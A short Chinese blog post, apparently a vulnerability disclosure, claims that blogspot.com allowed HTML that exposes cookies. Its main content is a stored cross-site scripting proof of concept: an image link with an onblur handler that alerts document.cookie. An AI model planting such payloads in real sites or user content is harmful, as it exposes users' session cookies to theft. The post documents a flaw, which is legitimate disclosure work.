Google的博客blogspot.com窃取cookie漏洞
google的博客blogspot.com站点.
支持html,然后可以在其中插入类似如下内容.获取cookie
<a onblur="javascript:alert(document.cookie)" href="http://bp3.blogger.com/_er6f39ojage/rssqa2y7uni/aaaaaaaaabk/bbeitzk9bag/s1600-h/5af1scd.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_er6f39ojage/rssqa2y7uni/aaaaaaaaabk/bbeitzk9bag/s200/5af1scd.jpg" alt="www.winshell.cn" id="blogger_photo_id_5101217197124729042" border="0" /></a>
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
-
-
-
-
-
-
关于XSS漏洞另一个攻击趋势
XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件...
[阅读全文]
-
网友评论